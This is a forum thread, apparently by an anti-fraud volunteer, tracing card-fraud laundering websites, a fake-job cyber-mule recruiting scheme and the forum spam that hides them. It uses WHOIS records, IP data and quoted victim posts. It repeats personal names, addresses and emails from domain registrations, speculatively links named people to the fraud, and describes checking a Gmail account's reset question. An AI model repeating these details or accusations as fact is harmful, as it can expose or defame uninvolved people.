Broadband Tech > Security > Scam and Phishbusters > Ebook websites, fraud charges, Devbill/DigitalAge/Pluto

Another new themed card fraud laundering website design from the organized crime syndicate:

RAGDESIGN.COM 206-666-4778 »ragdesign.com




------------------
RAGDESIGN.COM
ragdesign.com
1-(206)-666-4778
support@ragdesign.com
---------------------




Hosted:

IP Address: 205.178.145.65
IP Location - Virginia - Herndon - Network Solutions Llc
Response Code: 200
Domain Status: Registered And Active Website

Search engine archive blocking:




Again, Multiple Forum spamming from Chisinau, Moldova:




Many posts within the past week:

ICANN Registrar:  ACTIVE REGISTRAR, INC.
.
Registration Service Provided By: Active-Domain LLC
.
Domain Name: ragdesign.com
Expiry Date: 25-May-2010
Creation Date: 25-May-2009
.
Name servers:
ns41.worldnic.com
ns42.worldnic.com
.
Registrant Name: kazuko fuller
Registrant Company: ragdesign.com
Registrant Email Address: robyn_wise47@yahoo.com
Registrant Address: 1705 stilton arch
Registrant City: chesapeake
Registrant State/Region/Province: VA
Registrant Postal Code: 23323
Registrant Country: US
Registrant Tel No: +1.9289625224
Registrant Fax No:

.
It is possible that the cyber-mule is named Robyn Wise
.
==============================================

HTFCREATIVE.COM 206-338-2535 »htfcreative.com




------------------
HTFCREATIVE.COM
htfcreative.com
1-(206)-338-2535
support@htfcreative.com
------------------




Registered and hosted via GoDaddy:

IP Address: 72.167.232.34
IP Location - Arizona - Scottsdale - Godaddy.com Inc
Response Code: 200
Domain Status: Registered And Active Website

Search engine archive blocking:




Group forum spamming from Chisinau, Moldova:




Same domain reg as HTFCREATIVE.COM, different email address:

ICANN Registrar:  GODADDY.COM, INC.
.
Registrant:
   kazuko fuller
   1705 stilton arch
   chesapeake, Virginia 23323
   United States
.
   Domain Name: HTFCREATIVE.COM
      Created on: 25-May-09
      Expires on: 25-May-10
      Last Updated on: 25-May-09
.
   Administrative Contact:
      fuller, kazuko  kazuko_fuller@yahoo.com
      1705 stilton arch
      chesapeake, Virginia 23323
      United States
      9289625224      Fax -- 9289625224
.
   Domain servers in listed order:
      NS35.DOMAINCONTROL.COM
      NS36.DOMAINCONTROL.COM

.

MGD

Another round of forum spamming is ready to start for E-RPMSOFT.COM 336-793-0285 »Ebook websites, fraud charges, Devbill/DigitalAge/Pluto

Within the past 48 hours there have been numerous forum registrations under E-RPMSOFT.COM.


and


Confirmation that the new registrations are once again originating from the Moldova, can be seen on forums where the member's country of origin is auto entered based on the geo location of the IP address of the applicant.




Though there are now numerous victim reports of the fraud charging, it is likely that this new round of spamming is intended to counteract the E-RPMSOFT.COM 336-793-0285 operation going into full blast fraud mode. The intent is to push any reference of the fraud charging off the first few pages of Google:

»www.google.com/search?hl=en&q=E-···oq=&aqi=



The posts are all copy and pastes of previous posts on the thread topic. It is obvious that the poster has no command of the English language. Similar postings on Russian forums are however unique and not copies of previous posts.

MGD

.

This confirmed crime syndicate's cyber-mule recruit fraud Skydex operation posted by iDeceive is a perfect example of one of the constant engines that drives this non stop massive organized fraud operation. The primary engine that drives it all of course, is the organized crime syndicate's constant unfettered hacked access to consumer's full card account data. The most crucial ingredient in processing that hacked data into cash, and laundering it out of the country, is the need for a consistent supply of duped cyber-mules. Consequently a large amount of resources are dedicated to this function, and the process is sophisticated. Not only have job adds been placed on Careerbuilder and Monster, the crminals have also opened business employer accounts with both, which enabled them to filter and peruse through their large databases of resumes. Some of the uncovered cyber-mules reported that they were directly targeted from their on file resumes with these online services

This confirms the belief that one the many components required to dismantle this multi year fraud operation is the alerting and educating of the population via mass media, etc, to this sophisticated recruiting vector. Reducing and eliminating the potential pool of recruits is a crucial ingredient of constricting this multi million dollar fraud laundering operation.

Let's have a look at the configuration phases of the cyber-mule fraud recruiting operation Skydex Soft Ltd aka skydexsoft.com Alex Malenkovsky career@skydexsoft.com

As noted by iDeceive and Whip , the domain was registered on 08/07/2009 and is hosted in Kiev, Ukraine at IP Address: 195.189.226.159 with hosting/DNS provided by VIP-NAME.COM.UA. The skydexsoft.com cyber-mule recruiting domain was fraudulently registered to a US name and address by someone whose primary language is Russian, via the usual:

ICANN Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM
.
Registration Service Provided By: HIGH QUALITY HOST COMPANY
Contact: +1.6462130098
.
Domain Name: SKYDEXSOFT.COM
.
Registrant:
    GLENN llc.
    JENNIFER GLENN        (jglenn19@gmail.com)
    2650 COUNTY ROAD 101
    TULELAKE
    California,96134
    US
    Tel. +743.3828992
.
Creation Date: 07-Aug-2009
Expiration Date: 07-Aug-2010
.
Domain servers in listed order:
    ns2.vip-name.com.ua

.

Even though the registration including the email address, all appears to be US based, we can establish that Russian was the primary language of the user from the email account. When the lost password procedure for the Gmail account is activated, the password reset question that was selected at set up time is in Russian:

Password reminder reset for jglenn19@gmail.com



Translation: "Number of the bus, which I regularly use?"

Within days after the domain registration the search engine seeding began. As mentioned already, hundreds of fake blog testimonial postings were made. These are two of the shorter ones made on August 13, 2009 on businessweek.com June article:

quote:

---

Reader Comments

Jamie Heidlage
August 13, 2009 12:00 PM

Our firm has been working on the internet market for several years,
and we've dealt with a lot of companies during these years, but Skydex
Soft Ltd(www.skydexsoft.com) deserves a special attention. The specialists
from this company work hard in order to please their customers and deliver
the best service. Frankly, we have not seen such qualitative product as
Skydex provides to us. They always meet deadlines for all the project
with the precise accuracy and all wishes carried out. We are happy
with result of their work, and we plan to co-operate with them
further. Now they are in the list of the best companies with which we
deal! We advise to consider this company and see if you can buy it
out.

==============================================

Renae Kaiser
August 13, 2009 03:45 PM

How could you describe the Skydex Soft Ltd(www.skydexsoft.com) activity?
It is the highest quality and fast delivery! This is exactly what is
needed! There is nothing else to add! I have not seen any other company
who would pay so much attention to clients. It is just a simple pleasure
to work with them. They actually are the best in the business! I thank God
that I came to know this company when I was looking who to use to
execute my project. So if you want a qualitative decision of your
problem – you can use this company without any doubt. They have a lot
of talented professionals working there.

---

Ref: businessweek.com

The purpose is to create a fake history of testimonials, and flood pages of search engines with the results:




Potential recruits will see an extended positive history. Any posts regarding job suspicions or fraud alerts will have to compete with these already established rankings.

The fake skydexsoft.com is hidden from the rest of us:




Where did a majority of these fake postings originate from?

IP 91.214.201.92

IP Information for 91.214.201.92
IP Location: Moldova, Republic Of Srl Roxnet-com
Resolve Host: static-91-214-201-92.roxnet.md
IP Address: 91.214.201.92

Whois Record
inetnum:        91.214.200.0 - 91.214.203.255
netname:        ROXNET-COM-NET
descr:          SRL ROXNET-COM
descr:          Chisinau, Moldova
country:        MD
org:            ORG-SR21-RIPE
admin-c:        IFS1-RIPE
tech-c:         IFS1-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-END-MNT
mnt-lower:      RIPE-NCC-END-MNT
mnt-by:         MNT-ROXNET-COM
mnt-routes:     MNT-ROXNET-COM
mnt-domains:    MNT-ROXNET-COM
source:         RIPE # Filtered
.
organisation:   ORG-SR21-RIPE
org-name:       SRL ROXNET-COM
org-type:       OTHER
address:        MD-2024
address:        Chisinau, Moldova
address:        str. T.Vladimiresku  8/1
e-mail:
mnt-ref:        MNT-ROXNET-COM
mnt-by:         MNT-ROXNET-COM
source:         RIPE # Filtered
.
person:         Igor F. Spac
address:        MD-2024
address:        Chisinau, Moldova
address:        str.T.Vladimiresku  8/1
e-mail:
phone:          +37369409540
phone:          +373-22-438819
nic-hdl:        IFS1-RIPE
mnt-by:         MNT-ROXNET-COM
source:         RIPE # Filtered
.
route:          91.214.200.0/22
descr:          SRL ROXNET-COM
origin:         AS49527
mnt-by:         MNT-ROXNET-COM
source:         RIPE # Filtered

.
ROXNET.MD



Coincidentally the same city and country where the numerous forum postings of the various card fraud websites originated from. In that case the seeding was intended to mask postings about the fraud charges. It is my conclusion that the Moldovian blackhat operation is one of hired posters. The quality of that work is sub par compared to the core operation. Indicative of hired hands is the sloppy methods which leave trails. For example, if you needed additional convincing that the Crayon Web template group, the later Anti virus malware group, and the new ragdesign.com group format were related, you only have to look at samples the SEO work.:




All posted consecutively on the same forum thread from Moldova. Ties them all to one source in a nice package.




We know from iDeceive 's posting alert, that by 08/26 the syndicate had opened a business account on Monster.com and was sifting through resumes looking for potential cuber-mules for targeting. Once the seeding of the search engines were completed another phase of the skydexsoft.com fraud recruiting operation began. During the evening hours of Friday September 11th 2009 the first signs of a mass job posting run was detected on Careerbuilder.com.

The posted fraud job:




Note that the job add included a direct link that when clicked opened the application page on skydexsoft.com within a window:




The posting of job adds on careerbuilder.com continued over the weekend By late Saturday night there were over one hundred and twenty job adds posted for cities around the US:




Even though they list limited Saturday hours, mutiple attempts top reach Careerbuilder by phone to get the adds pulled failed. That failure is what prompted me to write in an earlier report that authorize.net / Cybersource was in danger of loosing their number one ranking for incompetence relevant to this long running massive fraud operation. However in this case there was a positive outcome.

On Sunday 09/13 a stage two phase of job postings began. The reason that this was considered a second phase is that the text of the posted job add had changed. This may indicate that there were two syndicate members doing the posting. The listed requirements for the job were now different. For example one of the listed requirements of the the first add stated "Over 30 years of age". On the second phase of the run on Sunday that requirement had changed to "Be over 21 year old"




Also note the apparent embedded error code in the job posting, indicating that the format was prepared on a Computer with a Russian language / keyboard setting:

"normal 0 false false false RU X-NONE X-NONE MicrosoftInternetExplorer4"

The mass Careerbuilder job posting ultimately peaked between midnight Sunday 09/13 and 2AM Monday 09/14 with a total of 153 jobs posted on careerbuilder.com. A search of Carrerbuilder's database ran around midnight Sunday for "SKYDEX" produced 153 job entires in cities around the US totalling 7 pages of results:







The fraudulent job adds were targeted in 153 cities across the USA:







Worse yet, during Saturday and Sunday 09/12 & 09/13, the fraudulent cyber-mule recruiting jobs adds were propagating across many of careerbuilder.com afiliates, including indeed.com and AOL Jobs. It was crucial to get the careerbuilder source shut down as soon as possible. Shortly after 8AM on Monday 09/14 several reports were sent to careerbuilder.com detailing the mass run of fake job adds and their purpose, along with requests to immediately remove all 153 job adds from their database. Though no direct response was received, by around 11AM all the jobs were removed from the main database. Though all the propagated adds that filtered down though affiliates still existed, all the links to the careerbuilder jobs would be dead.

I am not sure how much this operation cost at careerbuilder, however, an attempt to duplicate what the syndicate had set up, produced an estimate of several thousand dollars. I can not be positive that it was the alert which caused the removal, as no direct reply was received. Nevertheless the fake jobs were removed, and that is what counts.

Continued in next post .....

MGD

.
Interesting that you mention the UK, though I have repeatedly searched, I have not seen any actual UK based operation from this crime syndicate since the 2008 UK Strawberry card fraud operation, which you had a bird's eye view of from its birth. I suspect there may be some as they are difficult to detect in this form of stealth mode. What does occur from time to time is UK card victim data is ran through the fraudulent US merchant accounts. The lack of noise is probably due to the fact that the data is dispersed an mixed simultaneously through multiple card fraud laundering entities of the crime syndicate.

Ironically, I ran across just such an example of UK victims a few days ago during the unmasking of the latest tangible items fraud laundering group. A financial security systems insider with whom I have collaborated with over the last two years, has been vigorously preventing and shutting down the organized crime syndicate's card fraud laundering entities. This individual who is now an expert on sniffing them out of the system, has done more by far, of anyone on the inside, in disrupting and preventing the crime syndicate from functioning. They are the unsung hero when comes to who has been the most effective at targeting the card fraud laundering operation. In fact, it was they who went above and beyond the call of duty, and spend hours tracking down and terminating the accounts of the half decade long fraud operation of KCSOFTWARECOM LLC aka KCSOFTLLC.COM.

One of the OCS's new tangible theme card fraud laundering entities unmasked in the past week while in its infancy was SUPPATOYS.COM 303-261-8619, a product of the SANTAREX TOYS recruitment campaign:

As usual, a DIRECTI bogus domain registration:

Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: SUPPATOYS.COM

Registrant:
    HERRING llc.
    ARTHUR  HERRING   (nortonbjstove@hotmail.com)
    cowpath rd. 358
    lansdale
    Pennsylvania,19446
    US
    Tel. +178.9756342

Creation Date: 26-Nov-2009
Expiration Date: 26-Nov-2010

Domain servers in listed order:
    ns2.r01.ru
    ns1.r01.ru

Server Type: Apache/2.2.3 (Linux/SUSE)
IP Address: 195.24.66.108
IP Location: - Moskva - Moscow - Garant-park-telecom
Response Code: 200
Domain Status: Registered And Active Website

IP Address History SUPPATOYS.COM

Event Date	Action	Pre-Action IP	Post-Action IP
==========================================================
2009-12-03	New	-none-  	213.155.7.168  Ruslan Zhavrud Ukraine
2009-12-13	Change	213.155.7.168 	213.155.7.172  Ruslan Zhavrud Ukraine
2010-02-15	Change	213.155.7.172 	213.155.25.172 Ruslan Zhavrud Ukraine
2010-02-25	Change	213.155.25.172 	195.24.66.108  (Moscow State University)

The first and so far only reports of fraud charges are coming from victims in the UK posting on the UK moneysavingexpert.com forum:

quote:

---

05-04-2010, 6:29 PM #1
alibongo42
MoneySaving Stalwart

Weird credit card transaction

I have just discovered a small value credit card transaction that I don't believe I actioned. I need to wait until tomorrow to call my card company, but having done a bit of research, it seems really weird. I wanted to canvas opinion and see if anyone has heard of anything like this.

The transaction was on 16 Mar 10, and is for £6.19 and came from "WWW SUPPATOYS COM". Turns out this was a US transaction, converted from dollars. I have not been in the US since Jan, and did not use this card there. I also don't recall making any online transactions that would fit.

The website is a blank page. Nothing interesting when I view the source code either. When I ping the IP address, it belongs to somewhere in Russia.

On googling the website, it is listed as the homepage for a variety of usernames on a variety of forums (spanning a vast array of topics). In each case, the user has only registered from 23rd - 26th March 10, and made only one post. The posts are coherent, but usually have no significance to the subject of the forum. In some cases the user has a status of BANNED. The most common username is MSMILLER36.

I can find no online reference to anyone else commenting on potentially fraudulent activity from this site.

Has anyone heard of anything like this before? Even if my card company change my card, I will still be curious as to what this is all about!

================================================================

05-04-2010, 7:56 PM #3
Wml
MoneySaving Newbie

Another weird card tranaction

Hello, I too have a transaction from www suppatoys com, like you I know I didn't make this tranaction and have had my card blocked!
The transaction was on 17th March and was for £7.01, also converted from US dollars. Looks like someone is setting up a nice big scam!!!!!

================================================================
05-04-2010, 9:03 PM #8
alibongo42
MoneySaving Stalwart

Card now stopped, and I'm not the first customer to have called with the same query!

---

Ref:»forums.moneysavingexpert.com/sho···31598811

Interestingly, and as noted by the first victim who posted on moneysavingexpert.com, there are numerous SEO seeding with forum posts using "suppatoys.com 303-261-8619" as a signature:





Ref:»www.google.com/search?hl=en&q=su···gs_rfai=

If you are wondering about the apparently native English skills of the seed postings, which in the past have been documented as originating from IP addresses in both Moldova and the Russian Federation, it is because they copy and paste postings from other forums.

An observant analysis will conclude that there was an intentional fraud processing run of known UK card data, because unlike past SEO forum post seeding, some of these appear to intentionally target UK based forums. In addition, the fact that some of the posts were originally copied from UK forums can be derived from the EU spelling of "favorite" in this subject title "Your favourite toy of your childhood?"

Once again, smart ... but not smart enough !!

MGD

Interesting for sure, I have mentioned before that as one shadows this global operation you will frequently bump against online drug pharma, porn, and various financial related entities. Often wondering, then sometmes taking detours to research and see if some of the tangent entities that share the same tiny corner of cyberspace do so out of sheer random coincidence, or not. The domain you just pointed out is another in that chin scratching variety where one ponders the odds of coincidence.

You cannot help but wonder when you see four frequently mentioned countries in this thread: Russia, Belarus, Ukraine and Moldova, all listed:



»taconsult.biz/en/about/

For example, for many months the advance search engine seeding of the fraud domains to prevent victim complaints from surfacing were traced to IP addresses in and around Chisinau, the capital of Moldova. Even though one can find Linkedin profiles associated with that above domain, and they appear legit, one still wonders how it happened to end up sharing a miniscule DNS. It would not be unrealistic to estimate that a dozen or more experts could spend the better part of a year or two just examining all the tangent angles from the core of this operation.

In keeping with the random miniscule and isolated dns / hosting providers of FULLYDIGISTORE.COM now known thanks to info from wreave to be operating out of San Jose, California. A noteworthy location, in that it is less than 150 miles to the north west from one of the current most prolific fraud charging entities VPNMONSTER.COM operating out of Fresno, California. A genetic clone, code wise, of FULLYDIGISTORE.COM is the newly discovered SCAM FRAUD = USTECHTODAY.COM 209-710-5237 = FRAUD SCAM »ustechtoday.com



Not only does it share the identical code and contents with altered graphics and theme as FULLYDIGISTORE.COM, in keeping with DrStrange 's research, it also shares the same area code and city prefix:

============================
Contact Us

If you have any problems, comments or suggestions, please feel free to contact us. We will reply within 24 hours during regular business days.

Phone : 209-710-5385

E-Mail : support@fullydigistore.com

Business Hours: Mon-Fri 8:00am to 5:00pm Central Time Zone

New Ticket Submission Form
We are always ready and available to answer your questions and to provide quick resolutions to your problems. Just contact us. Message Details


==============================

Contact Us

If you have any problems, comments or suggestions, please feel free to contact us. We will reply within 24 hours during regular business days.

Phone : 209-710-5237

E-Mail : support@ustechtoday.com

Business Hours: Mon-Fri 8:00am to 5:00pm Central Time Zone

New Ticket Submission Form
We are always ready and available to answer your questions and to provide quick resolutions to your problems. Just contact us. Message Details


==============================

Though currently hosted with a Moscow based provider, it is using a minimalist DNS which only covers a few dozen hosts:

Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: USTECHTODAY.COM

Registrant:
    PrivacyProtect.org
    Domain Admin        ()
    P.O. Box 97
    Note - All Postal Mails Rejected,
visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Creation Date: 07-Apr-2010
Expiration Date: 07-Apr-2011

Domain servers in listed order:
    ns1.m-hoster-1.ru
    ns2.m-hoster-1.ru

=======================
Server Type:Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
IP Address: 178.162.163.99
IP Location: - Russian Federation - Rustelekom Llc.
Obshestvo S Ogranichennoj
Response Code: 200
Domain Status: Registered And Active Website
=======================

Registered since April 2010 and identically cloaked as its sibling, and around 43 domains serviced by that dns: »www.robtex.com/dns/m-hoster-1.ru.html#shared I have not yet pulled a history to see if it was always cloaked since birth.

One can trace the same genetic source code to a third fraud website recently defunct XMAXELECTRO.COM Though google has cashed copies due to a non blocking robots.txt file at some point, it did not cache the contact us page and preserve a phone number.We can however pull Google's cache copy of a fakewebsite product:
>http://xmaxelectro.com/product_info.php?products_id=19061

which is available here: »webcache.googleusercontent.com/s···nk&gl=us



You can insert the other two domains in the identical path structure to obtain the identical corresponding item on the other two card fraud laundering websites:

>http://xmaxelectro.com/product_info.php?products_id=19061

>http://fullydigistore.com/product_info.php?products_id=19061



>http://ustechtoday.com/product_info.php?products_id=19061



Once again XMAXELECTRO.COM

Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: XMAXELECTRO.COM

Registrant:
    PrivacyProtect.org
    Domain Admin        ()
    P.O. Box 97
    Note - All Postal Mails Rejected,
visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Creation Date: 23-Jun-2010
Expiration Date: 23-Jun-2011

Domain servers in listed order:
    ns1.adiba.ru
    ns2.adiba.ru

=======================
Server Type:Apache
IP Address:83.133.126.92
IP Location: - Germany - Greatnet New Media
Response Code:403
Domain Status:Registered And Active Website
=======================

Robtex shows only about 8 domains using the NS of adiba.ru: »www.robtex.com/dns/ns1.adiba.ru.html#shared

The are significant patterns, digital fingerprinting, cyberlogical profiles, etc, that one can build from the behavior patterns of this operation.

MGD